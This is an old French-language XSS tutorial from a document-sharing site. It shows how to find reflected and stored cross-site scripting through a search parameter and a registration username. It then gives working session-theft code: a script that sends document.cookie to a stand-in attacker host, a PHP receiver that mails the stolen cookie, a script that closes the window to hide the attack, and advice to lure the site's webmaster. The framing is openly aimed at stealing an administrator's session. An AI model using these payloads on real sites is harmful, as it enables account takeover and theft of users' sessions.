Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Faille XSS

Télécharger au format txt, pdf ou txt
Télécharger au format txt, pdf ou txt
Vous êtes sur la page 1sur 3

Faille XSS ---------Nous allons etudier ici une des failles des plus connus, la faille XSS.

Que signfie XSS ? Cross site scripting. Mais alors pourquoi Xss ?? Tout simplement car en html, CSS existe deja, et desi gne le Cascading Style Sheets : feuilles de style en cascade, qui permet de definir le design au niveaux des polices d'un site. Le XSS est donc le faite d'injecter des donnes arbitraires dans les scripts. Le p rincipe consiste injecter des donnes dans un site qui ne possde pas de vrifications des informations passs dans l' URL. Nous imaginerons donc la scene suivante : Un site web, proposant un champs de recherche de pseudo, via un formulaire de ce type : --------------------------------------------------------------------------------<form name="FormName" action="index.php" method="GET"> // Debut du formulaire <input name="user" type="text" value=""> // Champs de recherche <input type="submit" value="Recherche"> // Bouton de recherche </form> // Fin de formulaire --------------------------------------------------------------------------------(http://folcan.free.fr/NC/tuts/xss/xss1.jpg) Lors d'un clique sur le bouton Recherche, avec le pseudo Folcan, nous obtenons c eci : (http://folcan.free.fr/NC/tuts/xss/xss2.jpg) Nous voyons ici que l'url renvoi la valeur du champs, et nous donne le pseudo en tr. Par tout hasard, nous essayons de rentrer directement le user dans l'url, ce qui donnerait : http://127.0.0.1/xss/index.php?user=test (http://folcan.free.fr/NC/tuts/xss/xss3.jpg) Tiens donc, il a l'air d'avoir essay de trouver le user ! Nous retapons donc Folcan dans l'url directement pour verifier : http://127.0.0.1/xss/index.php?user=Folcan (http://folcan.free.fr/NC/tuts/xss/xss4.jpg) Bingo ! Apparament les donnes sont manipulables dans l'url. Alors on va maintenant ce pench sur un probleme plus interressant... Quitte a inclure des choses, autant que ca nous serve ! Alors testons la hate d'inclure un bout de code javascript du genre : <script>alert('Hacked By Folcan')</script>

et ceci dans l'url : http://127.0.0.1/xss/index.php?user=<script>alert('Hacked By Folcan')</script> (http://folcan.free.fr/NC/tuts/xss/xss5.jpg) Tiens donc, encore mieux, il nous execute notre bout de code !! Nous venons donc de trouver une faille XSS ! Mais a quoi sert elle exactement ?? Juste a mettre une alert que seul nous pourr ons voir ? Pas exactement... Si maintenant vous vous inscrivez au site, et que la variable n'est toujours pas protg, vous pourrez alors injecter votre alert en temps que pseudonyme ! Inscrivez vous donc sur le site avec comme pseudo : <script>alert('Hacked By Fol can')</script> Rendez vous maintenant a la page de visualisation des pseudos, et regardez tous les pseudos : (http://folcan.free.fr/NC/tuts/xss/xss6.jpg) Et voila qui est fait ! Entre autre, vous pouvez recuperer les valeurs des cookies de la personne, via l a variable document.cookie, voici une technique tir du site http://sisat.free.fr/phpnuke/modules.php?name=Content&pa=sh owpage&pid=42 ----------------------------------------------Si le pirate veut recuperer le mot de passe du webmaster, il doit inserer le scr ipt : <script> window.open("http://www.site-du-hacker.com/cookies.php?cookies="+document.cookie ); </script> dans la barre d''adresse a la place de l'alerte. Ensuite, il cre une page cookies.php sur son site et y insere un script de recupe ration de variable : <? mail('email@example.com', 'Cookie webmaster', $cookies); ?> Ce script aura l'effet d'envoyer un mail au pirate avec le cookies de l''admin. Si le pirate veut quela victime ne s'en rende pas compte, il lui suffit d''ajout er un script a la suite de celui la qui fermera automatiquement la page : <script> opener=self; window.close(); </script>

Une fois cela fait, il demande au webmaster du site d''aller sur la page en ques tion, et le pirate recupere le cookie de l'admin! Il ne suffit plus au pirate, que d''attendre la reception du mail et d' 'y lire le cookie. ----------------------------------------------Et voila qui est fini pour le XSS.

Vous aimerez peut-être aussi